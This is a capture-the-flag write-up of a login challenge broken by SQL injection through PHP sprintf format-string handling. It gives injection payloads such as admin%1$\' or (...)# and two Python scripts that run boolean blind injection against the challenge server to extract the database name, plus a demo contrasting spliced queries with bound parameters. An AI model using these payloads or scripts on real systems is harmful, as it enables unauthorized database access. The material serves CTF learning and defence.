Challenge from the "Welcome Christmas, Win Big Prizes" event

mac  2022-06-30

Judging by the challenge title, this has to be an injection task.

First try a normal input, admin / admin. The response was password error!, which confirms that an admin account really exists.

Probing with the usual injection string admin' and 1=1# produced an error.


The part in the red box of the error screenshot gives us the hint: I remembered running into a vulnerability caused by sprintf format-string handling before.

The underlying principle is explained in the following article:

Injection risks introduced by sprintf format strings (sprintf格式化字符串带来的注入隐患)

Following the method from that article, first try admin%1$\' and 1=1#.


This returned username error!. Going by the initial test, if and 1=1 had executed successfully the response should have been password error!, so my guess is that and is being filtered.

Next, switch to an or statement and try again.


You can see the or statement executed successfully, so now it is time for blind injection (hoping nothing else gets filtered further along).
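The two responses above (username error! versus password error!) are what make the rest of this attack possible: once user text reaches the SQL parser, a true/false condition can be read off the server's answer. The following is an added example, not code from the write-up or from the challenge site, that reproduces that consequence in an in-memory SQLite database and sets it beside the fix, a bound parameter. The users table, the placeholder password and the response strings are constructed for the demo; the probe has the same shape as the write-up's admin%1$\' or (...)#, except that the trailing comment is written as -- because SQLite does not accept MySQL's #. The demo does not reproduce the PHP sprintf quirk itself, only what it leads to: input being parsed as SQL.

```python
import sqlite3

# Constructed demo data (not from the challenge): one account named "admin",
# matching the account the write-up found. The password is a placeholder.
USERS = [("admin", "placeholder-password")]

# The responses the challenge returned, reused as the demo's outcomes.
USERNAME_ERROR = "username error!"
PASSWORD_ERROR = "password error!"
LOGIN_OK = "login ok"

# Probe with the same shape as the write-up's "admin%1$\' or (...)#"; the
# comment is written as "-- " because SQLite does not accept MySQL's "#".
PROBE = "admin%1$\\' or (1=1)-- "


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def _check(row, password):
    """Turn a lookup result into the challenge-style response."""
    if row is None:
        return USERNAME_ERROR
    # Plaintext comparison only to keep the demo short; real code compares
    # against a stored password hash.
    return LOGIN_OK if row[0] == password else PASSWORD_ERROR


def login_vulnerable(conn, username, password):
    """User text is spliced into the query string.

    On the challenge site an escaping step existed but sprintf() undid it;
    the result is the same as here: once the quote is closed, the rest of
    the input is parsed as SQL, so "or (1=1)" matches the admin row.
    """
    sql = "SELECT password FROM users WHERE username = '%s'" % username
    return _check(conn.execute(sql).fetchone(), password)


def login_safe(conn, username, password):
    """The username travels as a bound parameter, never as query text.

    Whatever it contains (quotes, %1$, comment markers) is compared literally
    against the column, so no later formatting step can turn it into SQL.
    """
    sql = "SELECT password FROM users WHERE username = ?"
    return _check(conn.execute(sql, (username,)).fetchone(), password)


def demo():
    """Run the probe and normal logins through both versions."""
    conn = make_db()
    return {
        "vulnerable/probe": login_vulnerable(conn, PROBE, "111"),
        "safe/probe": login_safe(conn, PROBE, "111"),
        "safe/admin wrong pw": login_safe(conn, "admin", "111"),
        "safe/admin right pw": login_safe(conn, "admin", USERS[0][1]),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-22s -> %s" % (case, result))
```

With the vulnerable lookup the probe comes back as password error!, exactly the signal the write-up relies on; with the bound parameter the same input is just a non-existent username. A single generic "login failed" message would also remove the true/false oracle, but that only hides the problem; binding the parameter removes it.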

First, find the length of the current database name:

#coding:utf-8
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'   # returned when the injected condition is true (admin row matched)
worry = 'username error!'   # returned when it is false
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

for i in range(30):
    # the or clause is true only for the correct length, which yields "password error!"
    key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
    data = {'username': key, 'password': '111'}
    r = requests.post(url, data=data).text
    if right in r:
        print('the length of database is %s' % i)

Then recover the database name one character at a time:

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

database = ''
for j in range(1, 4):              # one position per character of the name
    for each in dic:
        # compare the ASCII code of the j-th character against each candidate
        key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))=" % j + str(ord(each)) + ")#"
        data = {'username': key, 'password': '111'}
        r = requests.post(url, data=data).text
        print(key)
        if right in r:
            database += each
            print(each)
            break
print('the name of database is %s' % database)